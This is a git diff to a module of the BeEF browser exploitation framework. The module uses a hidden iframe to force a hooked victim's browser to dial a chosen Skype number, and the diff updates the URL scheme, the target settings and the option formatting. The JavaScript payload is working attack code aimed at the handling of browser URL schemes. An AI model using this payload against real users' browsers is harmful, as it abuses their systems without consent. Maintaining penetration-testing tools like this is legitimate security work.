diff --git a/modules/host/insecure_url_skype/command.js b/modules/host/insecure_url_skype/command.js
index 543439af9..00f6ac8f4 100644
--- a/modules/host/insecure_url_skype/command.js
+++ b/modules/host/insecure_url_skype/command.js
@@ -15,6 +15,6 @@
//
beef.execute(function() {
var sploit = beef.dom.createInvisibleIframe();
- sploit.src = 'skype://<%= @tel_num %>?call';
+ sploit.src = 'skype:<%= @tel_num %>?call';
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=IFrame Created!");
});
diff --git a/modules/host/insecure_url_skype/config.yaml b/modules/host/insecure_url_skype/config.yaml
index e88a63b82..b2d153bd6 100644
--- a/modules/host/insecure_url_skype/config.yaml
+++ b/modules/host/insecure_url_skype/config.yaml
@@ -22,5 +22,4 @@ beef:
description: "This module will force the browser to attempt a skype call. It will exploit the insecure handling of URL schemes
The protocol handler used will be: skype."
authors: ["xntrik", "Nitesh Dhanjani"]
target:
- working: ['S']
- user_notify: ['C', 'FF', 'O']
+ user_notify: ['S', 'C', 'FF', 'O']
diff --git a/modules/host/insecure_url_skype/module.rb b/modules/host/insecure_url_skype/module.rb
index 5d1ad67b4..b08fd15cb 100644
--- a/modules/host/insecure_url_skype/module.rb
+++ b/modules/host/insecure_url_skype/module.rb
@@ -16,7 +16,13 @@
class Insecure_url_skype < BeEF::Core::Command
def self.options
- { 'name' => 'tel_num', 'description' => 'The telephone number to dial', 'ui_label'=>'Number', 'value' =>'5551234', 'width' => '200px' }
+ return [{
+ 'name' => 'tel_num',
+ 'description' => 'The telephone number to dial',
+ 'ui_label'=>'Number',
+ 'value' =>'5551234',
+ 'width' => '200px'
+ }]
end
def post_execute